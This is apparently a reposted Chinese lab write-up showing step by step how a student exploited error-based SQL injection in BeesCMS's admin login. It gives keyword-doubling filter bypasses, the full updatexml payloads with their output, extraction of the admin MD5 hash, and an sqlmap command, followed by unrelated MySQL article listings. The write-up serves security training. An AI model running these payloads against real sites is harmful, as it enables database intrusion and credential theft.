BeesCMS的SQL注入漏洞

2023-12-12 23:38

本文主要是介绍BeesCMS的SQL注入漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

本文作者:arakh(MS08067实验室Web安全攻防知识星球学员)

根据星球布置作业,完成BeesCMS的SQL注入漏洞过程如下:

1. 扫描后台
    获得后台登陆地址:

2. 登陆后台,发现存在SQL报错,而且同一个验证码可以重复提交 使用

3. 由于有报错信息,尝试使用联合查询或是报错注入


    测试发现,sql语句过滤了 and  select 等号 等符号。等号用like替 代, and 用  an and d 替代, select 用 seleselectct替代 , from 用 fro from m替代,
     where用wh where ere替代
 
    因为注入的页面为登陆页面,即使union查询的语句语法正确了,也 无法获得回显,因此考虑使用报错注入
 

       
4. 报错注入
 
 // 查询数据库版本:


user=admin' a and nd 

updatexml(1,concat(0x7e,version(),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: '~5.5.53~'
 
    // 查询当前用户
 user=admin' a and nd updatexml(1,concat(0x7e,user(),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: '~root@localhost~'


    // 查询当前数据库
 user=admin' a and nd 

updatexml(1,concat(0x7e,database(),0x7e),1)-
&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: '~beescms~'


    // 查询当前表名
 user=admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(table_name) fr from om 

information_schema.tables whe where re table_schema like 

database()),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: 

'~bees_admin,bees_admin_group,bee'


发现输出字符串长度被限制了,使用截取字符串函数,测试发现每次 输出多为32个字符,所以需要不断变换截取字符的起始位置来获得 所有表的名称 

user=admin' a and nd 

updatexml(1,concat(0x7e,substr((selselectect 

group_concat(table_name) fr from om 

information_schema.tables whe where re table_schema like 

database()),1,32),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


user=admin' a and nd 

updatexml(1,concat(0x7e,substr((selselectect 

group_concat(table_name) fr from om 

information_schema.tables whe where re table_schema like 

database()),32,64),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


    // 查询bees_admin表中的列名 

user=admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(column_name) fr from om 

information_schema.columns whe where re table_schema like 

database() a and nd table_name like 'bees_admin'),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: 

'~id,admin_name,admin_password,ad'


同样存在字符串输出长度限制,需要使用substr()函数进行截取。

    // 获取字段内容 

user=admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(admin_name) fr from om 

beescms.bees_admin),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: '~admin~'


user=admin' a and nd updatexml(1,concat(0x7e,(selselectect 

admin_password fr from om beescms.bees_admin wh where ere 

admin_name like 'admin'),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: '~21232f297a57a5a743894a0e4a801fc'


user=admin' a and nd 

updatexml(1,concat(0x7e,substr((selselectect admin_password fr 

from om beescms.bees_admin wh where ere admin_name like 

'admin'),24,64),0x7e),1)-

&password=fdjal&code=d41b&submit=true&submit.x=42&submit.y=35


操作数据库失败XPATH syntax error: '~e4a801fc3~'


拼凑后的md5值:21232f297a57a5a743894a0e4a801fc3     

解密 后:admin

5. SQLMap
C:\Users\Administrator\Desktop\sqlmap>sqlmap.py -r bees.log -p "user"

枚举表名的过程失败

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

目前26000+人已关注加入我们


这篇关于BeesCMS的SQL注入漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/486343

相关文章

SQL Server 中的表进行行转列场景示例

《SQLServer中的表进行行转列场景示例》本文详细介绍了SQLServer行转列(Pivot)的三种常用写法,包括固定列名、条件聚合和动态列名,文章还提供了实际示例、动态列数处理、性能优化建议... 目录一、常见场景示例二、写法 1:PIVOT(固定列名)三、写法 2:条件聚合(CASE WHEN)四、

Mybatis对MySQL if 函数的不支持问题解读

《Mybatis对MySQLif函数的不支持问题解读》接手项目后,为了实现多租户功能,引入了Mybatis-plus,发现之前运行正常的SQL语句报错,原因是Mybatis不支持MySQL的if函... 目录MyBATis对mysql if 函数的不支持问题描述经过查询网上搜索资料找到原因解决方案总结Myb

MySQL 筛选条件放 ON后 vs 放 WHERE 后的区别解析

《MySQL筛选条件放ON后vs放WHERE后的区别解析》文章解释了在MySQL中,将筛选条件放在ON和WHERE中的区别,文章通过几个场景说明了ON和WHERE的区别,并总结了ON用于关... 今天我们来讲讲数据库筛选条件放 ON 后和放 WHERE 后的区别。ON 决定如何 "连接" 表,WHERE

mysql_mcp_server部署及应用实践案例

《mysql_mcp_server部署及应用实践案例》文章介绍了在CentOS7.5环境下部署MySQL_mcp_server的步骤,包括服务安装、配置和启动,还提供了一个基于Dify工作流的应用案例... 目录mysql_mcp_server部署及应用案例1. 服务安装1.1. 下载源码1.2. 创建独立

Mysql中RelayLog中继日志的使用

《Mysql中RelayLog中继日志的使用》MySQLRelayLog中继日志是主从复制架构中的核心组件,负责将从主库获取的Binlog事件暂存并应用到从库,本文就来详细的介绍一下RelayLog中... 目录一、什么是 Relay Log(中继日志)二、Relay Log 的工作流程三、Relay Lo

MySQL日志UndoLog的作用

《MySQL日志UndoLog的作用》UndoLog是InnoDB用于事务回滚和MVCC的重要机制,本文主要介绍了MySQL日志UndoLog的作用,文中介绍的非常详细,对大家的学习或者工作具有一定的... 目录一、Undo Log 的作用二、Undo Log 的分类三、Undo Log 的存储四、Undo

MySQL游标和触发器的操作流程

《MySQL游标和触发器的操作流程》本文介绍了MySQL中的游标和触发器的使用方法,游标可以对查询结果集进行逐行处理,而触发器则可以在数据表发生更改时自动执行预定义的操作,感兴趣的朋友跟随小编一起看看... 目录游标游标的操作流程1. 定义游标2.打开游标3.利用游标检索数据4.关闭游标例题触发器触发器的基

MySQL查看表的历史SQL的几种实现方法

《MySQL查看表的历史SQL的几种实现方法》:本文主要介绍多种查看MySQL表历史SQL的方法,包括通用查询日志、慢查询日志、performance_schema、binlog、第三方工具等,并... 目录mysql 查看某张表的历史SQL1.查看MySQL通用查询日志(需提前开启)2.查看慢查询日志3.

MySQL底层文件的查看和修改方法

《MySQL底层文件的查看和修改方法》MySQL底层文件分为文本类(可安全查看/修改)和二进制类(禁止手动操作),以下按「查看方法、修改方法、风险管控三部分详细说明,所有操作均以Linux环境为例,需... 目录引言一、mysql 底层文件的查看方法1. 先定位核心文件路径(基础前提)2. 文本类文件(可直

MySQL数据目录迁移的完整过程

《MySQL数据目录迁移的完整过程》文章详细介绍了将MySQL数据目录迁移到新硬盘的整个过程,包括新硬盘挂载、创建新的数据目录、迁移数据(推荐使用两遍rsync方案)、修改MySQL配置文件和重启验证... 目录1,新硬盘挂载(如果有的话)2,创建新的 mysql 数据目录3,迁移 MySQL 数据(推荐两